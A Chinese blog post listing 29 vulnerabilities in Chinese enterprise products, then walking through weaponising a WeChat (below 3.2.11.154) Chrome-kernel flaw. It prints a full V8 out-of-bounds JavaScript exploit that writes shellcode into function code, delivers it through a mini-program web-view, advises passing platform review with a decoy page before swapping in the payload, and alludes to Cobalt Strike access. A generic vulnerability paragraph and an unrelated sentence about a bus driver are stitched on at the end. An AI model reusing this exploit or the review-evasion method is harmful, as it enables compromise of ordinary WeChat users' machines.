2021部分漏洞公开以及复现

发布于 2021-09-22  501 次阅读


部分漏洞

  1. 微信最新版本3.2.11.151 Google内核
  2. 阿里巴巴otter manager分布式数据库同步系统信息泄漏-默认口令(CNVD-2021-16592)
  3. 爱快(iKuai) 后台任意文件读取(0day)
  4. 安天高级可持续威胁安全检测系统 越权访问漏洞
  5. 碧海威科技 L7 多款产品 后台命令执行
  6. 帆软 V9未授权RCE漏洞
  7. 帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757
  8. 泛微 OA 前台 GetShell 复现
  9. 泛微e-cology任意文件上传
  10. 泛微OA E-cology WorkflowServiceXml 远程代码执行漏洞
  11. 飞鱼星 家用智能路由 cookie.cgi 权限绕过
  12. 孚盟云 CRM系统多个高危漏洞
  13. 海康威视 流媒体管理服务器任意文件读取-通用弱口令 CNVD-2021-14544
  14. 和信创天云桌面系统命令执行,文件上传 全版本 RCE
  15. 宏电 H8922 路由器中多个漏洞(CVE-2021-28149~52)
  16. 华硕-GT-AC2900-身份验证绕过(CVE-2021-32030)
  17. 会捷通云视讯 敏感信息泄漏
  18. 金和OA C6 后台越权敏感文件遍历漏洞
  19. 金山 V8 终端安全系统 任意文件读取漏洞
  20. 金山 V8 终端安全系统 pdf_maker.php 未授权 RCE
  21. 金山终端安全系统 V8-V9存在文件上传漏洞
  22. 蓝海卓越计费管理系统 任意文件读取漏洞
  23. 蓝凌OA 前台 SSRF 到 RCE
  24. 蓝凌OA custom.jsp 任意文件读取漏洞
  25. 默安幻阵蜜罐安装平台未授权访问
  26. 齐治堡垒机任意用户登录
  27. 奇安信天擎 越权访问
  28. 奇安信NS-NGFW 网康下一代防火墙 前台RCE
  29. 锐捷 EG 易网关RCE 0day

由于篇幅过长,省略一部分

下面讲讲微信的这个漏洞怎么复现

微信最新版本3.2.11.151 Google内核poc利用上线cs方式

微信对版本进行了紧急更新,但是忽略了小程序,依旧可执行shellcode!影响版本:<3.2.11.154

首先你需要一个小程序至于小程序怎么开通 怎么认证各位大佬肯定有招!然后你需要跳转你的外部网站附上跳转代码:

<view>
 <web-view src="https://pidc.vip"> </web-view>
</view>

可以再测试页面进行上线测试如下:

配合进程自动迁移,懂的自然懂!

提交审核(随便做一个可以带内容的H5模板提交。审核备注:对小程序展示内容进行更新!)审核通过后直接更改更目录index.html内容即可,然后你的日子就越来越有判头了!

POC没变这里是index.html 引用js代码:

<script src="test.js"></script>

这里是POC test.js文件代码

ENABLE_LOG = true;IN_WORKER = true;var shellcode = [0x11,0x00,0x21];function print(data) {}var not_optimised_out = 0;var target_function = (function (value) {if (value == 0xdecaf0) {not_optimised_out += 1;}not_optimised_out += 1;not_optimised_out |= 0xff;not_optimised_out *= 12;});for (var i = 0; i < 0x10000; ++i) {target_function(i);}var g_array;var tDerivedNCount = 17 * 87481 - 8;var tDerivedNDepth = 19 * 19;function cb(flag) {if (flag == true) {return;}g_array = new Array(0);g_array[0] = 0x1dbabe * 2;return 'c01db33f';}function gc() {for (var i = 0; i < 0x10000; ++i) {new String();}}function oobAccess() {var this_ = this;this.buffer = null;this.buffer_view = null;this.page_buffer = null;this.page_view = null;this.prevent_opt = [];var kSlotOffset = 0x1f;var kBackingStoreOffset = 0xf;class LeakArrayBuffer extends ArrayBuffer {constructor() {super(0x1000);this.slot = this;}}this.page_buffer = new LeakArrayBuffer();this.page_view = new DataView(this.page_buffer);new RegExp({ toString: function () { return 'a' } });cb(true);class DerivedBase extends RegExp {constructor() {super({toString: cb}, 'g');this_.buffer = new ArrayBuffer(0x80);g_array[8] = this_.page_buffer;}}var derived_n = eval(`(function derived_n(i) {if (i == 0) {return DerivedBase;}class DerivedN extends derived_n(i-1) {constructor() {super();return;${"this.a=0;".repeat(tDerivedNCount)}}}return DerivedN;})`);gc();new (derived_n(tDerivedNDepth))();this.buffer_view = new DataView(this.buffer);this.leakPtr = function (obj) {this.page_buffer.slot = obj;return this.buffer_view.getUint32(kSlotOffset, true, ...this.prevent_opt);}this.setPtr = function (addr) {this.buffer_view.setUint32(kBackingStoreOffset, addr, true, ...this.prevent_opt);}this.read32 = function (addr) {this.setPtr(addr);return this.page_view.getUint32(0, true, ...this.prevent_opt);}this.write32 = function (addr, value) {this.setPtr(addr);this.page_view.setUint32(0, value, true, ...this.prevent_opt);}this.write8 = function (addr, value) {this.setPtr(addr);this.page_view.setUint8(0, value, ...this.prevent_opt);}this.setBytes = function (addr, content) {for (var i = 0; i < content.length; i++) {this.write8(addr + i, content[i]);}}return this;}function trigger() {var oob = oobAccess();var func_ptr = oob.leakPtr(target_function);print('[*] target_function at 0x' + func_ptr.toString(16));var kCodeInsOffset = 0x1b;var code_addr = oob.read32(func_ptr + kCodeInsOffset);print('[*] code_addr at 0x' + code_addr.toString(16));oob.setBytes(code_addr, shellcode);target_function(0);}try{print("start running");trigger();}catch(e){print(e);}

网络漏洞

关于网络漏洞,目前还没有全面、准确、统一的定义。一般可以理解为在硬件、软件、协议或系统安全策略的具体实现上存在缺陷,使得攻击者可以在未经授权的情况下访问或破坏系统。通俗的描述性定义是指计算机网络系统中存在的所有可能对系统中的组成和数据造成破坏的因素。具体例子:如IntelPentium芯片的逻辑错误、Sendmail早期版本的编程错误、NFS协议中的认证方式存在缺陷、Unix系统管理员设置匿名Ftp服务时配置不当等。被攻击者利用,威胁系统安全。这些可以被视为系统中的安全漏洞。

希望企业能加强对网络漏洞的管理,及时发现和解决这些


公交车司机终于在众人的指责中将座位让给了老太太